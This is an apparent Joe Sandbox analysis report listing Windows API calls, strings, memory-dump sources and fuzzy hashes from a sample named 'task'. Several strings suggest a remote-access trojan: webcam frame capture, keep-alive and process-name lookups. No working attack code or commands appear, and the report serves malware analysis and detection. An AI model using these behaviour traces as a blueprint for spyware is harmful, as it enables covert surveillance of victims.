                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                • API String ID: 3706160523-1405518554
                                                                                                                                                                • Opcode ID: 144766a78c653dbf6253b9e866e723b215494392d99ece3983ead44137bfcada
                                                                                                                                                                • Instruction ID: 5f019d3693c4adf4e6a851b4421edb41a8876ebe76c285fe8e685e8b56b4194b
                                                                                                                                                                • Opcode Fuzzy Hash: 144766a78c653dbf6253b9e866e723b215494392d99ece3983ead44137bfcada
                                                                                                                                                                • Instruction Fuzzy Hash: 67F06235504748ABC724FF60E857EEEB3B59F24790F50452DF516064D3EF70AA48C691
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00065239
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065245
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065250
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065259
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                • String ID: KeepAlive | Disabled
                                                                                                                                                                • API String ID: 2993684571-305739064
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 000790B9
                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 000790C7
                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 000790CE
                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 000790D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                • String ID: Alarm triggered
                                                                                                                                                                • API String ID: 614609389-2816303416
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32), ref: 6FE7E428
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6FE7E438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: o$SetThreadDescription$kernel32
                                                                                                                                                                • API String ID: 1646373207-2496278970
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000000,000C8980), ref: 00064603
                                                                                                                                                                  • Part of subcall function 00064746: __EH_prolog.LIBCMT ref: 0006474B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prologSleep
                                                                                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                • API String ID: 3469354165-3547787478
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __dosmaperr$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 242264518-0
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0008B9D1,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1), ref: 000AB2AB
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000AB2E3
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0008B9D1,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1,?), ref: 000AB334
                                                                                                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1,?,00000002,?), ref: 000AB346
                                                                                                                                                                • __freea.LIBCMT ref: 000AB34F
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 000AA2D3
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000AA2F6
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000AA31C
                                                                                                                                                                • _free.LIBCMT ref: 000AA32F
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000AA33E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                APIs
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02587842
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0258785B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 0007A383
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 0007A396
                                                                                                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000018,00000000), ref: 0007A3B6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 0007A3C1
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 0007A3C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2951400881-0
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 221f20c0a6ce461d3ac42c52f164b3dbbf6abf13dcd910ca69b46a51ad7fb88f
                                                                                                                                                                • Instruction ID: 309801f6e2150c40ee7c8666fc53e9dde1e47448e5dce4e5b742ddb0f1cbb858
                                                                                                                                                                • Opcode Fuzzy Hash: 221f20c0a6ce461d3ac42c52f164b3dbbf6abf13dcd910ca69b46a51ad7fb88f
                                                                                                                                                                • Instruction Fuzzy Hash: 0FF09632416762ABEF28FB68D5C0C2A77EBBA427657548815F01CDB500CF74FC805A5C
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 6FE72B38
                                                                                                                                                                Strings
                                                                                                                                                                • __rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6FE7996D
                                                                                                                                                                • s<unknown>, xrefs: 6FE797B0
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FE797B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$s<unknown>
                                                                                                                                                                • API String ID: 724789610-600858821
                                                                                                                                                                • Opcode ID: fee5603c5615adb1270a1e0c1918671e9b62f53d50550f96012b196bcf769bef
                                                                                                                                                                • Instruction ID: 66e7db7ef9cd9736f883f1ca1f4beaf540d3a968f108f2c1e65b21b83a5ac00b
                                                                                                                                                                • Opcode Fuzzy Hash: fee5603c5615adb1270a1e0c1918671e9b62f53d50550f96012b196bcf769bef
                                                                                                                                                                • Instruction Fuzzy Hash: 88C15675D007089FDB21CF94C880B9EBFB5EF4A318F20815AE8586B395D775A942CBA1
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 6FEA51F6
                                                                                                                                                                • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 6FEA5194, 6FEA51A5
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FEA51C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
